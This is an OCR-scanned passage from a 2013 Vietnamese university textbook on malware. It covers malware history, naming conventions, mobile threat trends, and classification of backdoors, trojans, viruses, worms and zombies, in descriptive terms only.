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LOI NOI DAU 
Ngày nay công nghệ thông tin, mang Internet ngày càng phat triển. Khi 

nhu cầu của việc sử dụng Internet của con người ngày cảng tăng thì cũng 
là lúc những nguy co mất an toàn thông tin xuất hiện càng nhiều, nói bật 
là các nguy cơ từ mã độc. Mã độc xuất hiện bất kỳ ở đâu trên môi trường 
của các thiết bị điện tử như các đĩa mềm, thiết bị ngoại vi USB, máy tính 
đến môi trường Internet trong các website, trong các tin nhắn, trong hòm 
thư điện tử của người dùng, trong các phần mềm miễn phí....Mã độc đã 
lây lan vào một máy tính hoặc hệ thống mạng sẽ gây những thiệt hại 
khó lường. Hiện nay càng ngày càng nhiều loại mã độc xuất hiện ở các 
thé hiện khác nhau, chạy trên nhiều môi trường khác nhau như Windows, 
Linux, MacOS, Android, IOS... Giáo trình Mã độc sẽ giúp sinh viên có 
những kiến thức cơ bản về mã độc, những hoạt động, những cách thức 
dé nhận dạng, phân tích xử lý mã độc, giảm thiểu thiệt hại cho các hệ 
thống máy tính. Giáo trình gồm những chương như sau: 
Chương 1. Tổng quan về mã độc 

Nội dung trình bày các dạng mã độc, nguy cơ, các phương pháp phát 
hiện và phòng chống mã độc. 
Chương 2. Cơ chế hoạt động của mã độc 

Nội dung trinh bày các dinh dạng phó biến của mã độc, cơ chế hoạt 
động của mã độc. 
Chương 3. Cơ bản về phân tích mã độc 

Nội dung trình bày các kiến thức cơ bản về phân tích mã độc, quy trình 
phân tích. 
Chương 4. Các kỹ thuật phân tích tĩnh 

Nội dung trình bày kỹ thuật phân tích tĩnh ứng dụng vào việc phân tích 
mã độc. 
Chương 5. Cac kỹ thuật phân tích động 
Nội dung trình bày kỹ thuật phân tích động ứng dụng vào việc phân tích 


mã độc. 
Hà nội, ngày 4 tháng 10 năm 2013 
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Chuong 1 

TONG QUAN VE MA DOC 

1.1 Lich sử phat triển của mã độc hai 
1.1.1. Khái niệm mã độc 

Malware (Malicious software) hay còn gọi là mã độc (Malicious code) 
là tên gọi chung cho các phần mềm được thiết ké, lập trình đặc biệt để 
gây hại cho máy tính hoặc làm gián đoạn môi trường hoạt động mạng. 
Mã độc thâm nhập vào một hệ thống máy tính mà không có sự đồng ý 
của nạn nhân. 

Mã độc hại còn được định nghĩa là “một chương trình (program) được 
chèn một cách bí mật vào hệ thông với mục đích làm tốn hại đến tính bí 
mật, tính toàn vẹn hoặc tính sẵn sảng của hệ thống” 

Nhiều người sử dụng máy tinh vẫn thường dùng thuật ngữ Virus dé chỉ 
chung cho các loại mã độc hại nhưng thực chất mã độc hại bao gồm 
nhiều loại khác nhau. 

1.1.2 Quy ước đặt tên 

Hiện nay có rất nhiều loại mã độc khác nhau được các hãng phần mèm 
diệt Virus thu thập tai các thời điểm khác nhau, điều này dan đến việc 
thống nhất đặt tên mã độc theo một quy ước tên nhất định rất khó thực 
hiện được. Vào năm 1991, các thành viên sáng lập CARO (Computer 
Antivirus Reseachers Organization) đã thiết kế một chương trình đặt tên 
cho mã độc ứng dụng cho các sản phẩm AntiVirus, tuy nhiên các chương 
trình của tó chức CARO này đã lạc hậu so với xu thế phát triển và tốc độ 
phát trên của mã độc hiện giờ. Các nhà nghiên cứu, các hãng sản phẩm 
không có thời gian để thỏa thuận với nhau tên chung cho một mẫu mã 
độc mới. Mặc dù như vậy nhưng về cơ bản các hãng đều đặt tên các mẫu 
mã độc theo quy ước như sau: 

Type.Flatform.FamilyName. Variant 
Trong do: 
Type chỉ ra kiểu mã độc: trojan, dropper, virus, adware, backdoor, 
rootkit, worm... 


Flatform chỉ ra môi trường họa động của mã độc : 


13 


Win32 : Hé diéu hanh windows 32 bits 

Win64 : Hệ điều hành windows 64 bits 

Linux : Hệ diéu hành Linux 

OSX : Hé diéu hanh Mac OSX 

SymbOS : Symbian OS 

Android : Hé diéu hành android 
FamilyName: Tên dòng mã độc, với các đặc điểm, phương thức hoạt 
động giống nhau. 
Variant: đại diện cho các biến thé trong một dòng mã độc. 
Ví dụ: Virus.Win32.XdocCrypt.1 
Type: Virus, Flatform: Win32, Family: XdocCrypt, Variant:1. 
1.1.3 Lịch sử phát triển 

Hiện nay Internet ngày cảng phát triển song song đó là sự phát triển lớn 
mạnh của mã độc. Mỗi ngay có hàng trăm mẫu mã độc xuất hiện, dưới 
nhiều hình thức khác nhau, mục tiêu khác nhau. Phần dưới đây liệt kê 
một số mốc quan trọng sự phát triển của mã độc. 

Năm 1949 John von Neuman (1903-1957) phát triển nền tảng lý thuyết 
tự nhân bản của một chương trình cho máy tính. 

Năm 1981 các virus đầu tiên xuất hiện trong hệ điều hành của máy tính 
Apple II. 

Năm 1983 Fred Cohen, một sinh viên đại hoc Mỹ, đã dua ra định nghĩa 
đầu tiên về virus: “Là một chương trình máy tính có thể tác động những 
chương trinh máy tính khác băng cách sửa đổi chúng bằng phương pháp 
đưa vào một bản sao của nó”. Fred Cohen luôn là cái tên được nhắc đến 
khi nói về lịch sử virus. 

Năm 1986 hai anh em lập trình viên người Pakistan là Basit và Amjad 
thay thế mã thực hiện (executable code) trong rãnh ghi khởi động của 
một đĩa mềm bằng mã riêng của họ, được thiết kế với mục đích phát tắn 
từ một đĩa mềm 360K khi cho vảo bắt cứ ô đĩa nào. Loại đĩa mềm mang 
virus nay có mác “© Brain”. Đây chính là những virus MS-DOS xuất 
hiện sớm nhất. 

Năm 1987 Lehigh, một trong những virus file đầu tiên xâm nhập các 


tệp lệnh command.com (virus này sau đó tién hoá thành virus Jerusalem). 
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Một virus khác có tên IBM Christmas, với tốc độ phát tan cực nhanh 
(500.000 bản sao/tiéng), là con ác mộng đối với các máy tính lớn 
(mainframe) của Big Blue trong suốt năm đó. đồng hồ của máy tính 
(giống bom nó chậm cài hàng loạt cho cùng một thời điểm). 

Thang 11 cùng năm, Robert Morris chế ra worm chiếm cứ các máy tính 
của ARPANET làm liệt khoảng 6.000 may. 

Năm 1991 virus đa hình (polymorphic virus) ra đời đầu tiên là Tequilla. 
Loại này biết tự thay đổi hình thức của nó, gây ra sự khó khăn cho các 
chương trình chống virus. 

Năm 1994 Trò lừa qua e-mail đầu tiên xuất hiện trong cộng đồng tin 
học. Trò nay cảnh báo người sử dụng về một loại virus có thé xoá toàn 
bộ 6 cứng ngay khi mở e-mail có dòng chủ đề “Good Times”. Mặc dù 
không gây thiệt hại gì mà chỉ có tính chất doạ dẫm, trò lừa này vẫn tiếp 
tục xuất hiện trong chu kỳ từ 6 đến 12 tháng/lần. 

Năm 1995 macro virus đầu tiên xuất hiện trong các mã macro trong các 
tệp của Word và lan truyền qua rất nhiều máy. Loại virus này có thé làm 
hư hệ điều hành chủ. 

Năm 1999 Bubble Boy sâu máy tính đầu tiên không dựa vào việc người 
nhận email có mở file đính kèm hay không. Chỉ cần thư được mở ra, nó 
vẫn sẽ tự hoạt động. 

Năm 2003 Slammer một loại worm lan truyền với vận tốc kỉ lục, truyền 
cho khoảng 75 ngàn máy trong 10 phút. 

Năm 2004 đánh dau một thế hệ mới của mã độc hại là worm Sasser. Với 
loại worm này thì người ta không cần phải mở đính kèm của điện thư mà 
chỉ cần mở lá thư là đủ cho nó xâm nhập vào máy. Sasser không hoàn 
toàn hủy hoại máy mà chỉ làm cho máy chủ trở nên chậm hơn và đôi khi 
nó làm máy tự khởi động trở lại. Ở Việt Nam mã độc hại cũng gây ra 
những thiệt hại đáng kể. 

Năm 2005 Sự xuất hiện của các Virus lây qua các dịch vụ chatting. Các 
dịch vu chatting trực tuyến như Yahoo!, MSN bắt đầu được Virus lợi 
dụng như một công cụ phát tán trên mạng. Theo thống kê của BKAV thì 
trong vòng 6 tháng đầu năm có tới 7 dòng Virus lây lan qua các dịch vụ 
chatting xuất hiện ở Việt Nam. Trong thời gian tới những Virus tắn công 
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thông qua các dich vu chatting sẽ còn xuất hiện nhiều hon nữa khi mà số 
người sử dụng dịch vụ ngày cảng tăng. 

Cũng trong năm này đã ghi nhận loại mã độc phát tán qua mail cực kỳ 
nguy hiểm. MyTob là loại Virus tạo ra một mạng lưới “Botnet”, các máy 
tính bị kiểm soát có thé bị lợi dụng dé phát tán thư rác, cai đặt các phần 
mềm SpyWare và gây ra các cuộc tấn công giả mạo. Mặc dù vào thời 
điểm này Botnet và các cuộc tấn công vào email không hề mới nhưng 
MyTob là loại Virus đầu tiên đã kết hợp mạng lưới Botnet với một 
chương trình gửi email hàng loạt. Giúp kẻ tan công đánh cắp thông tin, 
tiền... của người của nạn nhân chứ không phải chỉ là nghịch ngợm, quấy 
roi như trước đây. 

Tháng 6/2010 đánh dấu một bước ngoặt về mã độc hại. Đó là sự xuất 
hiện của “Sâu máy tính chiến tranh mạng Stuxnet”. Stuxnet lây lan qua 
các thiết bị USB và các phương pháp khác, Stuxnet được tạo ra để phá 
hoại một mục tiêu cụ thể: Nhà máy lọc dầu, nhà máy điện, hay nhà máy 
hạt nhân(điển hình là cuộc tấn công vào nha máy hạt nhân làm giàu 
Uranium của Iran gây ra thiệt hại vô cùng lớn của nước này khi tao ra sự 
ngưng trệ mat hai năm của nhà máy). 

Tháng 3/2011 là sự “lên ngôi” của các loại mã độc trong môi trường 
mobile. Kẻ tấn công phát tán mã độc lên những chiếc điện thoại thông 
mình nhằm thu thập thông tin người dùng. Điển hình là hơn 3000 điện 
thoại Vodafone bị phơi nhiễm mã độc. 

1.1.4 Xu hướng phát triển 

Hiện nay ngày càng nhiều phần mềm độc hại nhằm đến các nén tang 
di động, đặc biệt nhằm vào các điện thoại thông minh. Theo báo cáo của 
hãng AntiVirus Kaspersky quý 2/2013 thì đã có hơn 100 000 phần mềm 
độc hại trên di động được phát hiện. 
Các dữ liệu được thu thập bằng cách sử dụng Kaspersky Security 
Network dựa trên công nghệ đám mây (KSN). Tất cả các số liệu được 
thực hiện với sự đồng ý của người sử dụng tham gia KSN. 
Những phần mềm nảy chủ yếu đến từ các quốc gia có số người sử dụng 
Internet cao, đặc biệt là Trung Quốc. Số liệu của Kaspersky cho thấy 
tong số website phát tan malware có tới 26% site nam tại Trung Quốc. 
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Tiếp theo do là Mỹ (18%) va Nga (12%). Các chương trình mã độc hai 
ngày càng phức tap và nguy hiểm, nhưng cũng có chương trình lại rất 
đơn giản xét từ góc độ kỹ thuật, và lại rất phó biến. Tuy nhiên, các 
chương trình phức tạp và nguy hiểm lại tăng lên nhiều so với 2 năm 
trước đây, trong đó nguy hiểm nhất là những chương trình có khả năng 
tự nhân bản, giữ nguyên các tính năng phá hoại và đồng thời sử dụng 
những cách thức che dau sự hiện diện của mình trong hệ thống. Bản thân 
công nghệ được sử dụng dé lần tránh của mã độc hai là rất mới và tinh vi. 
Cách đây 3-4 năm, công nghệ tự che dau như vậy vẫn còn trong giai 
đoạn nghiên cứu, nhưng hiện nay chúng đã trở thành phó biến toàn cau. 
Công nghệ tự nhân bản thì tuy đã có cách đây 20 năm và về nguyên lý 
thì công nghệ nay không có gi thay dëi cho đến nay. Tuy nhiên, khả 
năng tự nhân bản hiện nay thường kết hợp với những công nghệ khác để 
tạo ra khả năng lây lan và phá hoại hiệu quả hơn rất nhiều. 


Android Versus PC Threat Type Timeline Comparison 


August March July August January 
(ay 2010 2011 2011 2011 2012 
= — CH Dialer 
fc A * $55 eae 
Dad R : * 
DROIDSMS quoe GoldDream One-click Plankton Data stealer 
FAKEINST TOOR DroidDreamLight billing fraud LEADBOLT 
A Rootkit 
Morris PC Cyborg ZANGO NTRootkit ZeuS TIBS dialer KZ pone 
Police 888bar Morcut Passteal Porn dialer 
CODERED ransomware A „ng Em Ransomware 
$ ew S M 
1988 1989 1992 1999 2000 2002 


Hình 1-1 Các nguy co mát an toàn 


Ngay trong năm 2013 đã có tới 15 triệu mã độc hại, số lượng người 
dùng Internet ở Trung Quốc tăng rất nhanh, cao hơn cả Mỹ, chiếm tỷ lệ 
lớn nhất vé lượng người sử dụng Internet trên toàn cầu. Đồng thời, có 
mức tăng cao các hình thức tội phạm không gian ảo (cyber crime), sử 
dụng các chương trình độc hại như một công cụ hiệu quả dé đánh cắp tài 
sản. Trung Quốc 1a nơi có nhiều người dùng Internet nhất và cũng là nơi 


xuất phát nhiều tội phạm nhất là như vậy. 
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Hiện nay sự phát triển của các mạng xã hội sé tạo ra môi trường tốt cho 
các chương trình độc hại. Điều nay dễ hiểu vì người dùng thường tin 
tưởng các thành viên trong mạng xã hội, và do đó cũng không e ngại 
hoặc ít đề phòng hơn so với những cách thức giao tiếp khác. Mặt khác, 
mạng xã hội quy tụ rất nhiều thành phần, và trình độ nhận thức, hiểu biết 
về an toàn, bảo mật của người dùng trong mạng cũng rất thấp. Từ đó, có 
thé thay rang các chương trình độc hại tim được môi trường rất phù hợp 
trong mạng xã hội ảo. Bên cạnh đó, hiện giờ các điện thoại thông minh 
( smartphone) rất phó biến. Những điện thoại này đều sử dung các hệ 
điều hành và thường đều có các kho ứng dụng trên mạng. Những kho 
ứng dụng này cho phép các lập trình viên gửi phần mềm dé kiếm thu 
nhập, hoặc miễn phí. Tuy nhiên có rất nhiều phần mềm đã bị cài mã độc 
mà bên phía quản trị các kho ứng dụng không kiểm soát được hết van dé 
nay. Theo thống kê Bộ An ninh nội địa và Bộ Tư pháp Mỹ đã công bố 
báo cáo về các mối de dọa trên các hệ điều hành di động mà người tiêu 
dùng Mỹ phải đối mặt trong năm 2012. Kết quả là 79% các loại mã độc 
di động tập trung tấn công Android, hệ điều hành di động phó biến nhất 
thé giới. Điều đáng ngạc nhiên là hệ điều hành bị tan công nhiều thứ hai 
sau Android không phải là 10S của Apple mà là Symbian của Nokia, 
một hệ điều hành đang chết dần. Khoảng 19% mã độc nhắm vào hệ điều 
hành này. Nokia hiện đã chuyên han sang hệ điều hành Window Phone 
do Microsoft phát triển, do đó số lượng điện thoại chạy Symbian hiện 
không còn nhiều. iOS chỉ hứng chịu sự tan công của 0,7% mã độc, trong 
khi hệ điều hành Window Phone và BlackBerry cùng lĩnh 0,3% mã độc. 
Các chuyên gia cho biết các con số trên không phản ánh sự an toản của 
các hệ điều hành. Số lượng mã độc tân công một hệ điều hành không 


tương đương với sô người sử dụng tải và chạy các mã độc đó. 
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Hinh 1-2 Dién thoai sir dung hé diéu hành Android, IOS, Symbian 

Tuy nhién, con só 79% cüa Android van cao gap bón làn so vói hé diéu 
hành đứng sau. Do số người sử dung Android quá lớn, đây có thé là một 
mối đe dọa an ninh nghiêm trọng. Báo cáo của Chính phủ Mỹ cho biết 
mối đe dọa mã độc đối với Android đến từ ba hướng: tin nhắn chứa mã 
độc Trojan, mã độc rootkit và các ứng dụng độc hại trên các cửa hàng 
Google Play giả. 
Tin nhăn Trojan chiếm 50% các vu tán công nhắm vào Android và có 
thé khiến người sử dụng thiét hại nhiều tiền. 


ANDROID MALWARE GROWTH 
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ACTUAL 


Hinh 1-3 Biéu d6 su phat triển mã độc 


1.2 Phân loại mã độc 
Có nhiều tiêu chí để phân loại mã độc hại, dưới đây là hai cách 


phân loại dựa vào hình thức lây nhiễm và của NIST-National Institute of 
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Standart and Technology (Viện tiêu chuẩn — công nghệ quốc gia Hoa kỳ). 
Su chỉ phân loại mang tính chất tương đối. 


1.2.1.Theo hình thức lây nhiễm 
Malicious 
Code 


Needs Host 


Independent 


Replicate 
Hình 1-4 Phan loại mã độc hại 


Theo hình trên mã độc hại gôm 2 loại chính: một loại cân vật chủ 


dé tồn tại và lây nhiễm, vật chủ ở đây có thé là các file dữ liệu, các file 
ứng dung, hay các file chương trình thực thi... và một loại là tồn tại độc 
lập. 

Độc lập nghĩa là đó là chương trình độc hại mà có thể được lập 
lịch và chạy trên hệ điều hành. 

Không độc lập (needs host program) là 1 đoạn chương trình đặc 
biệt thuộc 1 chương trình nào đó không thể thực thi độc lập như một 
chương trình thông thường hay tiện ích nào đó mà bắt buộc phải có 
bước kích hoạt chương trình chủ trước đó thì chương trình đó mới chạy. 

1.2.I.1.Trap Door 

Trap Door còn được gọi là Back Door. 

Trong đời sống thường Trap Door mang ý nghĩa “cánh cửa” để 
vào một tòa nhà. 

Trap door là một điểm bí mật trong một chương trình, cho phép 
một ai đó có thể truy cập lại hệ thống mà không phải vượt qua các hàng 
rào an ninh như thông thường. Trap door được sử dụng bởi những nhà 


lập trình với mục đích dò lỗi, kiểm tra chương trình. 
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Trong các cuộc tan công trap door là phần mềm độc hai thường trú 
và đợi lệnh điều khiển từ các công dịch vụ TCP hoặc UDP. Trap door 
khi chạy trên máy bị nhiễm, nó sẽ thường trược trong bộ nhớ và mở một 
công cho phép kẻ tan công truy nhập vào máy nạn nhân thông qua công 
mà nó đã mở và kẻ tan công có toàn quyền điều khiển máy bị nhiễm. 

Trap door nguy hiểm ở chỗ nó hoàn toàn chay án trong máy. 
Nhiều con được hẹn trước giờ để kết nói ra ngoài (đến 1 giờ nhất dinh 
mới mở 1 port dé hacker đột nhập vô) nên rất khó phát hiện ngay cả scan 
port. 

Vi du: Back door W32/TDSS 1a 1 chuong trinh chiém quyén diéu 
khiến từ xa, bi mật điều khién hệ thong máy tinh bi nhiễm. 
1.2.1.2 Logic Bombs 

Logic bomb là đoạn mã độc được nhúng vào một chương trình 
hợp pháp mà chúng có thể thực thi khi có một sự kiện nào đó xảy ra. Các 
đoạn mã thường được chèn vào các ứng dụng hoặc các hệ điều hành để 
thực hiện việc phá hủy hệ thông hoặc phá hủy các chức năng an toàn của 
hệ thống. 

Logic bomb có thé gửi thông báo tới kẻ tan công khi người dùng 
truy nhập Internet và sử dụng một chương trình đặc biệt nào đó như bộ 
xử lý văn bản. Từ đó attacker có thé chuan bị cho các cuộc tan công 
(chang hạn kết hợp với các máy tính khác bị nhiễm dé bắt đầu một cuộc 


tan công từ chối dich vụ). 


a 1 
Victim 2 " Attacker 


———— a 
4 


Hình 1-5 Mô hình hoạt động Logic bomb 
Attacker đưa logic bom vào máy nạn nhân thông qua một chương 
trình ứng dung nao đó. 
Máy nạn cài đặt chương trình ứng dụng. 
Attacker gửi thông điệp tan công. 
Logic bom đã cai đặt trên máy nạn nhân. 
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1.2.1.3 Trojan Horses 

Trojan Horse là loại mã độc hai duoc dat theo sự tích “Ngựa thành 
Troy". Trojan horse không có khả nang tự nhân ban tuy nhiên nó lây vào 
hé thóng vói biéu hién rát binh thuóng nhung thuc chát bén trong có án 
chứa các đoạn mã với muc đích gây hai. Trojan có thé gây hai theo ba 
cách sau: 

Tiép tuc thuc thi các chüc náng cüa chuong trinh mà nó bám vào, 
bên cạnh đó thực thi các hoạt động gay hai một cách riêng biệt (vi du 
như gửi một trò chơi dụ cho người dùng sử dụng, bên cạnh đó là một 
chương trình đánh cắp password). 

Tiếp tục thực thi các chức năng của chương trình mà nó bám vào, 
nhung sửa đôi một số chức năng dé gây tôn hai (ví dụ như một trojan giả 
lập một cửa số login dé lay password) hoặc che dấu các hành động pha 
hoại khác (ví dụ như trojan che dấu cho các tién trình độc hại khác bằng 
cách tắt các hiển thị của hệ thống). 

Thực thi luôn một chương trình gây hại bằng cách núp dưới danh 
một chương trình không có hại (ví dụ như một troJan được giới thiệu như 
là một chò chơi hoặc một tool trên mạng, người dùng chỉ cần kích hoạt 
file này là lập tức dữ liệu trên PC sẽ bị xoá hết). 

Có 7 loại trojan chính: 

Trojan truy cập từ xa: Được thiết kế để cho kẻ tấn công có khả 
năng từ xa chiếm quyền điều khiến của máy bị hại. Các trojan này 
thường dấu vào các trò chơi và các chương trình nhỏ làm cho người 
dùng mat cảnh giác. 

Trojan gửi dtr liệu: Nó thực hiện việc lay và gửi dữ liệu nhạy cam 
như mật khâu, thông tin thé tín dung, các tệp nhật ký, địa chỉ email... 
cho kẻ tan công. Trojan này có thé tìm kiếm cụ thé thông tin hoặc cài 
phần mềm đọc trộm ban phím và gửi toàn bộ các phim bam về cho kẻ 
tan công. 

Trojan hủy hoại: Thực hiện việc xóa các tệp tin. Loại trojan này 
giống với virus và thường có thể bị phát hiện bởi các chương trình diệt 


virus. 
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Trojan kiểu proxy: Sử dụng máy tinh bi hại lam proxy, qua đó có 
thé sử dung máy bi hai dé thực hiện các hành vi lừa gat hay đánh phá các 
máy tính khác. 

Trojan FTP: Được thiết kế để mở công 21 và cho phép tin tặc kết 
nối vào máy bị hại sử dung FTP. 

Trojan tắt phần mềm an ninh: Thực hiện việc dừng hoặc xóa bỏ 
chương trình an ninh như phần mềm chống virus hay tường lửa mà 
người dùng không nhận ra. 

Trojan DoS: Được sử dung trong các cuộc tan công từ chối dịch 
vụ. Vi dụ các con bot sử dụng trong DDoS cũng có thể coi là một loại 
trojan. 

Vi du trojan có tên Zeus, Clampi đã mang về cho tội phạm hang 
triệu USD bằng cách ghi lại thông tin tài khoản để làm thẻ giả hoặc 
chuyên tiền vào tài khoản của một bên trung gian - goi là Mule. Mule 
sau đó được trả công để đảm nhận việc gửi tiền ra nước ngoài. Mule 
được thuê thông qua các trang tìm kiếm việc làm và họ không hề biết 
rằng số tiền họ nhận gửi đi là bất hợp pháp. 
1.2.1.4 Virus 

Virus là một loại mã độc hại có khả năng tự nhân bản và lây 
nhiễm chính nó vào các file, chương trình hoặc máy tính. Virus phải 
luôn bám vào vật chủ( có thé là file dữ liệu hoặc file ứng dụng ) dé lây 
lan. Các chương trình diệt virus dựa vào đặc tính này để thực thi việc 
phòng chống và diệt virus, để quét các file trên các thiết bị lưu trữ, quét 
các file trước khi lưu xuống 6 cứng. Vì vậy đôi khi các phần mềm diệt 
virus tại PC đưa thông báo “phát hiện nhưng không diệt được” khi thấy 
có các dấu hiệu hoạt động cua virus trên PC vì “vật mang virus” lại nằm 
trên một máy khác nên không thể thực thi việc xóa đoạn mã độc đó. 

Virus có thé làm bất cứ việc gì ma các chương trình khác có thé 
làm. Virus chỉ khác ở điểm nó tự đính kèm nó tới một chương trình và 
thực thi bí mật khi chương trình mang virut được thực thi. Khi virus 
được thực thi nó có thé làm bất kỳ việc gì trên hệ thống như xóa file, 


chương trình. Vòng đời virus gồm 4 giai đoạn: 
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Dormant (nằm im): Trong giai đoạn này virut không làm gi cho 
đến khi được kích hoạt bởi một ai đó hay một sự kiện nào đó. 

Propagation (lây lan): Trong giai đoạn này virus thực hiện việc 
copy chính nó tới các chương trình, vị trí khác trong 6 đĩa. 

Triggering: Trong giai đoạn nay virus được kích hoạt dé thực thi 
chức năng của nó. 

Execution: Chức năng của virus được thực thi. Chức năng có thé 
là vô hại như gửi một thông điệp nào đó tới màn hình, hoặc một chức 
năng có hại như phá hủy các chương trình, các file hệ thống. 

Virut gồm 7 loại chính 


Viruses 


Memory Resident 7 
Email 
Stealth 
Macro 
Boot Sector 


Program File 
Polymorphic 
Hinh 1-6 Phan loai virus 
Memory — resident virus: Cu trú rong bộ nhớ chính như là một 
phần của chương trình hệ thống. Theo đó virus sẽ gây ảnh hưởng mỗi 
khi chương trình được thực thi. 
Program file virus: Gây ảnh hưởng đến các file chương trình như 


exe/com/sys. 


JUMP 


JUMP 
Hinh 1-7 M6 ta virus lay file 
Polymorphic virus( virut đa hình): Loại virut này tự thay đổi hình 
thức của nó, gây khó khăn cho các chương trình anti-virus. Virus 


“Tequilla” là loại virus đa hình đầu tiên xuất hiện năm 1991. 
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Boot Sector virus: Là loại virut đầu tiên trên thế giới được phó 
biến rộng rãi và được viết vào năm 1986. Boot virut lợi dụng tiến trình 
boot của máy tính dé thực hiện việc kích hoạt mình. Khi máy tính được 
khởi động, nó luôn tìm đến master boot record được lưu trữ tại địa chỉ 
head 0, track 0, sector 1 dé đọc thong tin. Boot Sector virus lay lan sang 
dia cứng khi khởi động hệ thống từ dia mém bi nhiễm. 

Stealth virus: Day là loại virus có khả năng tự che dau không để 
cho hệ điều hành và phần mềm chống virus biết. Nó nằm trong bộ nhớ 
để ngăn chặn sử dụng hệ điều hành và che dấu những thay đổi về kích 
thước các tập tin. Những virus này chỉ bị phát hiện khi chúng còn ở trong 
bộ nhớ. Có nhiều boot sector virus có khả năng Stealth. Ví dụ virus "The 
Brain” được tạo ra tai Pakistan bởi Basit va Amjad. Chương trình này 
nằm trong phần khởi động (boot sector) của một đĩa mềm 360Kb và nó 
sẽ lây nhiễm tat cả các 6 đĩa mềm. Đây là loại "stealth virus" đầu tiên. 

Macro virus: La tập lệnh được thực thi bởi một ứng dung nao đó. 
Macro virus phó bién trong các ứng dụng Microsoft Office khi tận dung 
khả năng kiểm soát việc tạo và mở file dé thực thi và lây nhiễm. Ví dụ: 
virus Baza, Laroux và một số virus Staog xuất hiện năm 1996 tan công 
các file trong hệ điều hành Windows 95, chương trình bảng tính Excel và 
cả Linux. 

Virus Melisa cũng là một trong những Macro virus nói tiếng. 

Email virus: Là những virus được phát tán qua thư điện tử. Ví dụ 
virus Melissa được đính kèm trong thư điện tử. Nếu người dùng mở file 
đính kèm Macro được kích hoạt sau đó email virus này tự động gửi 
chính nó tới tất cả những hòm thư có trong danh sách thư của người đó. 
1.2.1.5 Worms 

Worm là chương trình độc hại có kha năng tự nhân bản va tự lay 
nhiễm trong hệ thống mà không cần file chủ để mang nó khi nhiễm vào 
hệ thống. Như vậy Worm không bám vào một file hoặc một vùng nao đó 
trên đĩa cứng, vì vậy không thể dùng các chương trình quét file để diệt 
Worm. 

Mục tiêu của Worm là làm lãng phí băng thông của mạng, phá 
hoại hệ thống như xóa file, tao back door, tha keylogger... 
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Tan công của Worm có đặc trưng là lan rộng cực kỳ nhanh chóng 
do không cần tác dụng của con người( như khởi động máy, copy file hay 
dóng/mo file). 

Worm có thé chia làm 2 loai: 

Network Service Worm lan truyén bang cách loi dung các 16 hong 
bao mát cua mang, cua hé điều hành hoặc của ứng dụng. 

Ví dụ Sasser (W32.Sasser.Worm) bắt đầu lây lan trên mạng vào 
1/5/2004 có thê tự động lây lan bất cứ máy tính nào kết nối internet. Nó 
lợi dụng lỗ héng bảo mật Local Security Authority Subsystem Service 
(LSASS - lỗi nay đã được Microsoft công bố và phát hành ban sửa lỗi 
ngày 13-4-2004) để tấn công các máy cài Windows 2000/ XP/ Server 
2003. 

Mass Mailing Worm là một dang tan công qua dịch vụ mail, tuy 
nhiên nó tự đóng gói dé tan công và lây nhiễm chứ không bám vào vật 
chủ là email. Khi sâu này lây nhiễm vào hệ thống, nó thường cố gắng 
tìm kiếm só địa chi và tự gửi bản thân nó đến các địa chỉ thu nhặt được. 
Việc gửi đồng thời cho toan bộ các địa chỉ thường gây quá tải cho mang 
hoặc cho máy chủ mail. 

Ví dụ Mydoom là một trong những loại Worm khiến nhiều hệ 
thong máy tinh bi tê liệt và gây thiệt hại tài chính lên đến hàng tỷ dóla. 
1.2.1.6 Zombie 

Zombie là chuong trinh dóc hai bí mát lién két vói mót máy tính 
khác ngoài internet dé nghe lénh tir các máy tính dó. Các Zombie thuong 
sử dung trong các cuộc tán công từ chối dich vu DDoS dé tan công vào 
một website nào đó. 

Kiéu thông dụng nhất của Zoombie là các agent dùng dé tô chức 
một cuộc tấn công DDoS. Kẻ tấn công có thể cài Zoombie vào một số 
lượng lớn các máy tính rồi ra lênh tan công cùng một lúc. 

Vi dụ Trinoo và Tribe Flood Network là hai Zoombie nói tiếng 


được sử dụng như các công cụ dé thực hiện tan công DDoS. 
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1.2.2 Phan loai cia NIST 
1.2.2.1 Virus 

Với cach định nghĩa, phân loại nay, virus là một loại mã độc hai 
(Maliciuos code) có khả năng tự nhân bản và lây nhiễm chính nó vào các 
file, chương trình hoặc máy tính. Như vậy virus máy tính phải luôn luôn 
bám vào một vật chủ (đó là file dữ liệu hoặc file ứng dụng) dé lay lan. 
Các chương trình diệt virus dựa vào đặc tinh nay dé thực thi việc phòng 
chống và diệt virus, để quét các file trên thiết bị lưu, quét các file trước 
khi lưu xuống 6 cứng... Điều này cũng giải thích vì sao đôi khi các phần 
mềm diệt virus tại PC đưa ra thông báo “phát hiện ra virus nhưng không 
diệt được” khi thấy có dấu hiệu hoạt động của virus trên PC, bởi vì “vật 
mang virus” lại nằm ở máy khác nên không thể thực thi việc xoá đoạn 
mã độc hại đó. 

Compiled Virus là virus mà mã thực thi của nó đã được dịch hoàn 
chỉnh bởi một trình biên dịch để nó có thể thực thi trực tiếp từ hệ điều 
hành. Các loại boot virus như (Michelangelo va Stoned), file virus (như 
Jerusalem) rất phổ biến trong những năm 80 là virus thuộc nhóm này, 
compiled virus cũng có thể là pha trộn bởi cả boot virus va file virus 
trong cùng một phiên bản. 

Interpreted Virus là một tổ hợp của mã nguồn mã chỉ thực thi 
được dưới sự hỗ trợ của một ứng dụng cụ thé hoặc một dich vu cụ thé 
trong hệ thống. Một cách đơn giản, virus kiểu này chỉ là một tập lệnh, 
cho đến khi ứng dụng gọi thì nó mới được thực thi. Macro virus, 
scripting virus là các virus nằm trong dang này. Macro virus rất phó bién 
trong các ứng dụng Microsoft Office khi tận dụng khả năng kiểm soát 
việc tạo và mở file để thực thi và lây nhiễm. Sự khác nhau giữa macro 
virus va scripting virus là: Macro virus là tập lệnh thực thi bởi một ứng 
dụng cụ thể, còn scripting virus là tập lệnh chạy bằng một service của hệ 
điều hành. Melisa là một ví dụ xuất sắc về Macro virus, Love Stages là 
ví dụ cho scripting virus. 
1.2.2.2 Worm 

Worm cũng là một chương trình có khả nang tự nhân ban và tự lây 
nhiễm trong hệ thống tuy nhiên nó có khả năng “tự đóng gói”, điều đó có 
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nghĩa la Worm không can phải có “file chủ” dé mang nó khi nhiễm vào 
hệ thống. Như vậy, có thê thấy rằng chỉ dùng các chương trình quét file 
sẽ không diệt được Worm trong hệ thống vì Worm không “bám” vào 
một file hoặc một vùng nao đó trên đĩa cứng. Mục tiêu của Worm bao 
gồm cả làm lãng phí nguồn lực băng thông của mang và phá hoại hé 
thống như xoá file, tạo backdoor, thả keylogger,... Tan công của Worm 
có đặc trưng là lan rộng cực kỳ nhanh chóng do không cần tác động của 
con người (như khởi động máy, copy file hay đóng/mở file). Worm có 
